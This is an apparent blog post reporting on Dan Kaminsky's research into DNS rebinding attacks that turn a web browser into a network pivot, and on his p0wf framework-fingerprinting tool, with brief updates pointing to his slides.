I’ve been a longtime fan of fellow hacker Dan Kaminsky, best known for his work in tracking down the spread of the sony rootkit. Recently I spoke with him about his current work, and he summed it up by saying, “I can turn your web browser into an VPN concentrator.” When I stared at him in disbelief he explained that using DNS rebinding he can get the browser to connect to any IP he chooses.
I will demonstrate an extension of RSnake and Boneh’s work, that grants full IP connectivity, by design, to any attacker who can lure a web browser to render his page.
I have had for a while a lurking feeling that the Web 2.0 world is full of surprising attack vectors that no one has come around to exploiting. Work like this doesn’t exactly fill me with confidence that the environment is secure.
If you have ever wondered what framework a certain site uses, Dan also gives us p0wf.
But the web has become almost an entirely separate OS layer of its own, and especially with AJAX and Web 2.0, new forms of RPC and marshalling are showing up faster than anyone can identify. p0wf intends to analyze these streams and determine just which frameworks are being exposed on what sites.
I am really happy Dan is on our side.
** Update 6:03 PM PST **
Megginson Technologies has more details and how it can affect you.
** Update 6:00 PM Thursday, Augusust 2 **
Dan finally posted his slides. He also discusses breaking audo captchas and busting provider hostility, the opposite of network neutrality.